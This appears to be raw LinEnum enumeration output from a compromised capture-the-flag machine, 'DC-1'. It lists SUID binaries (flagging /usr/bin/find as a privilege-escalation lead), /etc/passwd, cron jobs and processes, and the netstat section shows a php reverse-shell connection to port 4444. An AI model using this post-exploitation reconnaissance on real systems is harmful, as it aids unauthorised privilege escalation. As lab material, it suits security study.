434 -rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot435 -rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start436 -rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop437 -rw-r--r-- 1 root root 2427 Oct 16 2012README438 -rwxr-xr-x 1 root root 2227 Apr 16 2013acpid439 -rwxr-xr-x 1 root root 7820 May 26 2018apache2440 -rwxr-xr-x 1 root root 1071 Jun 25 2011atd441 -rwxr-xr-x 1 root root 1276 Oct 16 2012bootlogs442 -rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh443 -rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh444 -rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh445 -rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh446 -rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup447 -rwxr-xr-x 1 root root 3033 Jul 3 2012cron448 -rwxr-xr-x 1 root root 2813 Feb 6 2015dbus449 -rwxr-xr-x 1 root root 6435 Feb 11 2018exim4450 -rwxr-xr-x 1 root root 1329 Oct 16 2012halt451 -rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh452 -rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh453 -rwxr-xr-x 1 root root 7592 Apr 28 2012kbd454 -rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup455 -rwxr-xr-x 1 root root 1293 Oct 16 2012killprocs456 -rwxr-xr-x 1 root root 1990 May 21 2012kmod457 -rwxr-xr-x 1 root root 2405 Sep 26 2016mcstrans458 -rwxr-xr-x 1 root root 995 Oct 16 2012motd459 -rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh460 -rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh461 -rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh462 -rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh463 -rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh464 -rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh465 -rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh466 -rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql

467 -rwxr-xr-x 1 root root 4322 Mar 14 2013networking468 -rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common469 -rwxr-xr-x 1 root root 1346 May 20 2012procps470 -rwxr-xr-x 1 root root 6120 Oct 16 2012rc471 -rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local472 -rwxr-xr-x 1 root root 117 Oct 16 2012rcS473 -rwxr-xr-x 1 root root 639 Oct 16 2012reboot474 -rwxr-xr-x 1 root root 2727 Sep 26 2016restorecond475 -rwxr-xr-x 1 root root 1074 Jul 15 2013rmnologin476 -rwxr-xr-x 1 root root 2344 May 10 2017rpcbind477 -rwxr-xr-x 1 root root 3054 Oct 8 2014rsyslog478 -rwxr-xr-x 1 root root 3200 Oct 16 2012sendsigs479 -rwxr-xr-x 1 root root 590 Oct 16 2012single480 -rw-r--r-- 1 root root 4290 Oct 16 2012skeleton481 -rwxr-xr-x 1 root root 3881 Apr 15 2016ssh482 -rwxr-xr-x 1 root root 8827 Nov 9 2012udev483 -rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab484 -rwxr-xr-x 1 root root 2721 Apr 10 2013umountfs485 -rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh486 -rwxr-xr-x 1 root root 1122 Oct 16 2012umountroot487 -rwxr-xr-x 1 root root 3111 Oct 16 2012urandom488 -rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils489 -rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common490

491

492 [00;31m[-] /etc/init/ config file permissions:[00m493 total 48

494 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .

495 drwxr-xr-x 85 root root 4096 May 7 00:08 ..

496 -rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf497 -rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf498 -rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf499 -rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf500 -rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf501 -rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf502 -rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf503 -rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf504 -rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf505 -rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf506

507

508 [00;31m[-] /lib/systemd/*config file permissions: [00m509 /lib/systemd/:510 total 4.0K511 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system512

513 /lib/systemd/system:514 total 56K515 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants516 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants517 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants518 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants519 -rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service520 -rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket521 -rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service522 -rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket523 -rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket524 -rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service525 -rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service526 -rw-r--r-- 1 root root 384 Apr 29 2013 udev.service527 -rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service528 -rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket529

530 /lib/systemd/system/dbus.target.wants:531 total 0532 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket533

534 /lib/systemd/system/multi-user.target.wants:535 total 0536 lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service537

538 /lib/systemd/system/sockets.target.wants:539 total 0540 lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket541 lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket542 lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket543

544 /lib/systemd/system/basic.target.wants:545 total 0546 lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service547 lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service548

549

550 [00;33m### SOFTWARE ############################################# [00m551 [00;31m[-] MYSQL version: [00m552 mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2553

554

555 [00;31m[-] Apache user configuration: [00m556 APACHE_RUN_USER=www-data557 APACHE_RUN_GROUP=www-data558

559

560 [00;33m### INTERESTING FILES #################################### [00m561 [00;31m[-] Useful file locations: [00m562 /bin/nc563 /bin/netcat564 /usr/bin/wget565 /usr/bin/gcc566 /usr/bin/curl567

568

569 [00;31m[-] Installed compilers: [00m570 ii checkpolicy 2.1.8-2 i386 SELinux policy compiler571 ii gcc 4:4.7.2-1 i386 GNU C compiler572 ii gcc-4.7 4.7.2-5 i386 GNU C compiler573 ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)574 ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files)575

576

577 [00;31m[-] Can we read/write sensitive files: [00m578 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd579 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group580 -rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile581 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow582

583

584 [00;31m[-] SUID files: [00m585 -rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount586 -rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping587 -rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su588 -rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6589 -rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount590 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at591 -rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh592 -rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd593 -rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp594 -rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn595 -rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd596 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail597 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find598 -rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4599 -rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown600 -rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign601 -rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device602 -rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper603 -rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs604

605

606 [00;33m[+] Possibly interesting SUID files: [00m607 -rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find608

609

610 [00;31m[-] SGID files: [00m611 -rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent612 -rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at613 -rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate614 -rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile615 -rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage616 -rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write617 -rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock618 -rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall619 -rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab620 -rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry621 -rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail622 -rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile623 -rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter624 -rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd625

626

627 [-] Can't search *.conf files as no keyword was entered628

629 [-] Can't search *.php files as no keyword was entered630

631 [-] Can't search *.log files as no keyword was entered632

633 [-] Can't search *.ini files as no keyword was entered634

635 [00;31m[-] All *.conf files in /etc (recursive 1 level): [00m636 -rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf637 -rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf638 -rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf639 -rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf640 -rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf641 -rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf642 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf643 -rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf644 -rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf645 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf646 -rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf647 -rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf648 -rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf649 -rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf650 -rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf651 -rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf652 -rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf653 -rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf654 -rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf655 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf656 -rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf657 -rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf658 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf659 -rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf660

661

662 [00;31m[-] Location and contents (if accessible) of .bash_history file(s): [00m663 /home/flag4/.bash_history664 cd665 ls666 vi flag4.txt667 ls668 exit669

670

671 [00;31m[-] Any interesting mail in /var/mail: [00m672 total 8673 drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .674 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..675

676

677 [00;33m### SCAN COMPLETE #################################### [00m678

679 [00;31m######################################################### [00m680 [00;31m# [00m [00;33mLocal Linux Enumeration & Privilege Escalation Script [00m [00;31m# [00m681 [00;31m######################################################### [00m682 [00;33m# www.rebootuser.com [00m683 [00;33m# version 0.95 [00m684

685 [-] Debug Info686 [00;33m[+] Thorough tests = Disabled [00m687

688

689 [00;33mScan started at:690 Tue May 7 01:08:52 AEST 2019691 [00m692

693 [00;33m### SYSTEM ############################################## [00m694 [00;31m[-] Kernel information: [00m695 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux696

697

698 [00;31m[-] Kernel information (continued): [00m699 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1700

701

702 [00;31m[-] Specific release information: [00m703 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"704 NAME="Debian GNU/Linux"705 VERSION_ID="7"706 VERSION="7 (wheezy)"707 ID=debian708 ANSI_COLOR="1;31"709 HOME_URL="http://www.debian.org/"710 SUPPORT_URL="http://www.debian.org/support/"711 BUG_REPORT_URL="http://bugs.debian.org/"712

713

714 [00;31m[-] Hostname: [00m715 DC-1716

717

718 [00;33m### USER/GROUP ########################################## [00m719 [00;31m[-] Current user/group info: [00m720 uid=33(www-data) gid=33(www-data) groups=33(www-data)721

722

723 [00;31m[-] Users that have previously logged onto the system: [00m724 Username Port From Latest725 root tty1 Thu Feb 28 12:10:51 +1000 2019726

727

728 [00;31m[-] Who else is logged on: [00m729 01:08:52 up 1:00, 0 users, load average: 0.00, 0.00, 0.00730 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT731

732

733 [00;31m[-] Group memberships: [00m734 uid=0(root) gid=0(root) groups=0(root)735 uid=1(daemon) gid=1(daemon) groups=1(daemon)736 uid=2(bin) gid=2(bin) groups=2(bin)737 uid=3(sys) gid=3(sys) groups=3(sys)738 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)739 uid=5(games) gid=60(games) groups=60(games)740 uid=6(man) gid=12(man) groups=12(man)741 uid=7(lp) gid=7(lp) groups=7(lp)742 uid=8(mail) gid=8(mail) groups=8(mail)743 uid=9(news) gid=9(news) groups=9(news)744 uid=10(uucp) gid=10(uucp) groups=10(uucp)745 uid=13(proxy) gid=13(proxy) groups=13(proxy)746 uid=33(www-data) gid=33(www-data) groups=33(www-data)747 uid=34(backup) gid=34(backup) groups=34(backup)748 uid=38(list) gid=38(list) groups=38(list)749 uid=39(irc) gid=39(irc) groups=39(irc)750 uid=41(gnats) gid=41(gnats) groups=41(gnats)751 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)752 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)753 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)754 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)755 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)756 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)757 uid=105(mysql) gid=109(mysql) groups=109(mysql)758 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)759

760

761 [00;31m[-] Contents of /etc/passwd: [00m762 root:x:0:0:root:/root:/bin/bash763 daemon:x:1:1:daemon:/usr/sbin:/bin/sh764 bin:x:2:2:bin:/bin:/bin/sh765 sys:x:3:3:sys:/dev:/bin/sh766 sync:x:4:65534:sync:/bin:/bin/sync767 games:x:5:60:games:/usr/games:/bin/sh768 man:x:6:12:man:/var/cache/man:/bin/sh769 lp:x:7:7:lp:/var/spool/lpd:/bin/sh770 mail:x:8:8:mail:/var/mail:/bin/sh771 news:x:9:9:news:/var/spool/news:/bin/sh772 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh773 proxy:x:13:13:proxy:/bin:/bin/sh774 www-data:x:33:33:www-data:/var/www:/bin/sh775 backup:x:34:34:backup:/var/backups:/bin/sh776 list:x:38:38:Mailing List Manager:/var/list:/bin/sh777 irc:x:39:39:ircd:/var/run/ircd:/bin/sh778 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh779 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh780 libuuid:x:100:101::/var/lib/libuuid:/bin/sh781 Debian-exim:x:101:104::/var/spool/exim4:/bin/false782 statd:x:102:65534::/var/lib/nfs:/bin/false783 messagebus:x:103:107::/var/run/dbus:/bin/false784 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin785 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false786 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash787

788

789 [00;31m[-] Super user account(s): [00m790 root791

792

793 [00;31m[-] Are permissions on /home directories lax: [00m794 total 12K795 drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .796 drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..797 drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4798

799

800 [00;31m[-] Root is allowed to login via SSH: [00m801 PermitRootLogin yes802

803

804 [00;33m### ENVIRONMENTAL ####################################### [00m805 [00;31m[-] Environment information: [00m806 APACHE_PID_FILE=/var/run/apache2.pid807 APACHE_RUN_USER=www-data808 APACHE_LOG_DIR=/var/log/apache2809 PATH=/usr/local/bin:/usr/bin:/bin810 PWD=/var/www811 APACHE_RUN_GROUP=www-data812 LANG=C813 SHLVL=1814 APACHE_LOCK_DIR=/var/lock/apache2815 APACHE_RUN_DIR=/var/run/apache2816 _=/usr/bin/env817

818

819 [00;31m[-] Path information: [00m820 /usr/local/bin:/usr/bin:/bin821

822

823 [00;31m[-] Available shells: [00m824 # /etc/shells: valid login shells825 /bin/sh826 /bin/dash827 /bin/bash828 /bin/rbash829

830

831 [00;31m[-] Current umask value: [00m832 0022833 u=rwx,g=rx,o=rx834

835

836 [00;31m[-] umask value as specified in /etc/login.defs: [00m837 UMASK 022838

839

840 [00;31m[-] Password and storage information: [00m841 PASS_MAX_DAYS 99999842 PASS_MIN_DAYS 0843 PASS_WARN_AGE 7844 ENCRYPT_METHOD SHA512845

846

847 [00;33m### JOBS/TASKS ########################################## [00m848 [00;31m[-] Cron jobs: [00m849 -rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab850

851 /etc/cron.d:852 total 16853 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .854 drwxr-xr-x 85 root root 4096 May 7 01:08 ..855 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder856 -rw-r--r-- 1 root root 510 May 10 2018 php5857

858 /etc/cron.daily:859 total 68860 drwxr-xr-x 2 root root 4096 Feb 19 23:01 .861 drwxr-xr-x 85 root root 4096 May 7 01:08 ..862 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder863 -rwxr-xr-x 1 root root 633 May 30 2018 apache2864 -rwxr-xr-x 1 root root 14985 Oct 24 2014 apt865 -rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude866 -rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils867 -rwxr-xr-x 1 root root 256 May 3 2016 dpkg868 -rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base869 -rwxr-xr-x 1 root root 89 May 17 2012 logrotate870 -rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db871 -rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate872 -rwxr-xr-x 1 root root 249 May 26 2012 passwd873

874 /etc/cron.hourly:875 total 12876 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .877 drwxr-xr-x 85 root root 4096 May 7 01:08 ..878 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder879

880 /etc/cron.monthly:881 total 12882 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .883 drwxr-xr-x 85 root root 4096 May 7 01:08 ..884 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder885

886 /etc/cron.weekly:887 total 16888 drwxr-xr-x 2 root root 4096 Feb 19 22:25 .889 drwxr-xr-x 85 root root 4096 May 7 01:08 ..890 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder891 -rwxr-xr-x 1 root root 907 Jun 19 2012 man-db892

893

894 [00;31m[-] Crontab contents: [00m895 # /etc/crontab: system-wide crontab896 # Unlike any other crontab you don't have to run the `crontab'897 # command to install the new version when you edit this file898 # and files in /etc/cron.d. These files also have username fields,899 # that none of the other crontabs do.900

901 SHELL=/bin/sh902 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin903

904 # m h dom mon dow user command905 17 * * * * root cd / && run-parts --report /etc/cron.hourly906 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )907 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )908 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )909 #910

911

912 [00;33m### NETWORKING ########################################## [00m913 [00;31m[-] Network and IP info: [00m914 eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98915 inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0916 inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link917 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1918 RX packets:8711 errors:0 dropped:0 overruns:0 frame:0919 TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0920 collisions:0 txqueuelen:1000921 RX bytes:1327204 (1.2 MiB) TX bytes:1104845 (1.0 MiB)922

923 lo Link encap:Local Loopback924 inet addr:127.0.0.1 Mask:255.0.0.0925 inet6 addr: ::1/128 Scope:Host926 UP LOOPBACK RUNNING MTU:16436 Metric:1927 RX packets:50 errors:0 dropped:0 overruns:0 frame:0928 TX packets:50 errors:0 dropped:0 overruns:0 carrier:0929 collisions:0 txqueuelen:0930 RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB)931

932

933 [00;31m[-] ARP history: [00m934 192.168.16.112 dev eth0 INCOMPLETE935

936

937 [00;31m[-] Nameserver(s): [00m938 nameserver 192.168.16.254939 nameserver 0.0.0.0940

941

942 [00;31m[-] Default route: [00m943 default via 192.168.16.254 dev eth0944

945

946 [00;31m[-] Listening TCP: [00m947 Active Internet connections (servers and established)948 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name949 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -950 tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -951 tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -952 tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -953 tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -954 tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php955 tcp6 0 0 :::22 :::* LISTEN -956 tcp6 0 0 ::1:25 :::* LISTEN -957 tcp6 0 0 :::34190 :::* LISTEN -958 tcp6 0 0 :::111 :::* LISTEN -959 tcp6 0 0 :::80 :::* LISTEN -960 tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -961 tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT -962

963

964 [00;31m[-] Listening UDP: [00m965 Active Internet connections (servers and established)966 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name967 udp 0 0 0.0.0.0:59942 0.0.0.0:* -968 udp 0 0 0.0.0.0:68 0.0.0.0:* -969 udp 0 0 0.0.0.0:111 0.0.0.0:* -970 udp 0 0 0.0.0.0:769 0.0.0.0:* -971 udp 0 0 127.0.0.1:801 0.0.0.0:* -972 udp 0 0 0.0.0.0:21881 0.0.0.0:* -973 udp6 0 0 :::52815 :::* -974 udp6 0 0 :::28256 :::* -975 udp6 0 0 :::111 :::* -976 udp6 0 0 :::769 :::* -977

978

979 [00;33m### SERVICES ############################################# [00m980 [00;31m[-] Running processes: [00m981 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND982 root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]983 root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd]984 root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]985 root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]986 root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]987 root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset]988 root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper]989 root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs]990 root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns]991 root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers]992 root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]993 root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd]994 root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd]995 root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd]996 root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0]997 root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd]998 root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark]999 root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto]1000 root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd]1001 root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff]1002 root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0]1003 root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1]1004 root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2]1005 root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3]1006 root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4]1007 root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5]1008 root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6]1009 root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7]1010 root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8]1011 root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9]1012 root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10]1013 root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11]1014 root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12]1015 root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13]1016 root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14]1017 root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15]1018 root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16]1019 root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17]1020 root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18]1021 root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19]1022 root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20]1023 root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21]1024 root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22]1025 root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23]1026 root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24]1027 root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25]1028 root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26]1029 root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27]1030 root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28]1031 root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29]1032 root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30]1033 root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31]1034 root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]1035 root 191 0.0 